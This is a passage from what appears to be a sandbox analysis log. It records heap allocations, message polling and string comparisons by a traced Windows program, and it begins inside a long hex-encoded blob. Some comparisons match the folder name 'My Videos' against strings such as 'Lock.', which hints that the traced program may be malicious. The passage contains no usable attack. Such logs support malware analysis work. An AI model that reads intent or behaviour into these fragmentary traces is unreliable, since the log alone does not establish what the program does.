xf8c\xcb15\x95fa\xe8a4\xa8cb\x2e3f\x14bb\x6b3\x5df9\x7702\xd3f0\x713\xf0\x3f45\x567e\x303c\x138f\x5163\x543d\xd48a\x11b2\x6d0a\x2f19\xaaae\x4168\x376c\x6d46\xcf1d\xa27d\x952e\xec1a\xdd4f\xb31d\x9f70\xd5c7\x770f\xa661\x6240\xb4f6\x78c8\x6603\x48ec\x5ee3\x677d\xfab9\xd85d\xf516\xbd4b\xeddd\x1c8a\xc569\xa59b\x8c07\xfdc4\xf9a0\x12e9\x32d9\xe5e6\x5723\x6fc\x5f0f\xea79\xf02\x5090\xba41\xb699\x49f6\x90ec\x1d2f\xa58f\x699a\xa059\xd047\x721a\xbe35\x7bcf\xef92\xbb01\x61a2\xc20d\xe7d4\xb522\xc0ed\xab7\x249c\xde1b\x7db3\xacf0\x528d\xa43a\x91f\xec81\x5a9e\xe288\x85ad\x7de1\x847c\xe3b8\xa082\x6a3b\xbed0\x846e\xcf0\xa3b8\xc7ee\xc3fc\xccf3\xefb4\xcd7e\xbeef\xac16\x7a21\x4195\xac1b\x59d3\x5578\x9d50\xde05\x3b2\xb15d\xa3b7\x162\x6cca\xb8d3\xe78f\xd39e\x851a\xf161\xa686\xd9c8\x5e4d\xd57e\xd881\x9df6\x4f8\x3dce\x37e3\xc281\x1e3c\xc6e1\xd440\x7556\x9795\xb3c0\x3663\xceae\x3766\xcdf1\xe117\x9d44\x4fc\xdd9f\xf464\x4c0f\x8fdc\xf7\x7176\xb3ef\xbfe9\xda16\x326b\xf90f\x1d7e\xcb9d\xb8c2\x8913\x6978\xbf1f\xe075\xee4e\xbc2f\xab0\x17af\x4104\x3cab\xbb97\xcf80\x1e30\xb74a\x6e05\xaaa2\xaeb\xb3c\xcb06\x52d6\x5095\x6f15\xd071\xe441\xb428\x2101\xc60e\x614b\xd4e8\xbc1c\x86fc\x33fa\xbdcc\xc3eb\xd8c3\x5461\xba29\x2724\xc91e\x6153\x7525\xe960\x8409\x66ca\x33a1\x9b2\x73d8\xeeee\x66a2\xf864\xcf76\xf3a6\x87dd\x6a37\x3893\x34cb\x120a\xbef5\x2663\x5379\x39dc\x4a4\xc700\x21ce\x37f9\xef9d\x521c\x4e6c\xfe3\x1724\xf46a\xf72d\x7c8b\xec7d\xe8d0\x5d7\x1db4\x3faf\x4505\x20a3\xa676\xbb34\x8f0e\x3fb2\xdeea\xa7c0\xdfa\xabf7\x66e2\x2a0\x51e8\x7e5f\xb3e8\x2915\x21e8\x5ea0\x8596\x49ca\x4dd1\x1a29\xac7a\xaed7\xd47b\x86dd\x91fc\xaf6e\xcbe2\xa3c6\xa16e\x81a0\x49ae")) returned 0 [0267.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0267.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.521] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.522] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0267.522] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.522] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0267.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0267.522] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.522] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.522] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0267.523] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0267.523] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.523] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.523] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0267.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="My Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0267.524] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0267.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0267.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.524] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0267.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0267.531] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa928 | out: hHeap=0x25c0000) returned 1 [0267.531] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0267.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0267.531] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0267.531] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0267.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0267.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa928 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaac0 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaf0 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.532] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.532] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x90) returned 0x24207f0 [0267.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0267.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17c8 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1818 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.533] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.533] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x2420888 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1818 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1738 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0267.534] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa400 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0267.534] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0267.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0267.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6af8 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16f8 [0267.535] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0267.535] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bf8 [0267.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0267.536] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0267.536] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.536] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.536] CharUpperBuffW (in: lpsz="SSA0F00600E09", cchLength=0xd | out: lpsz="SSA0F00600E09") returned 0xd [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.537] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.537] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.537] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.537] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.546] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.546] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0267.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab38 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0267.547] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0267.547] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0267.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab50 [0267.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0267.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0267.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.548] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.548] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0267.548] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.548] RtlAllocateHeap 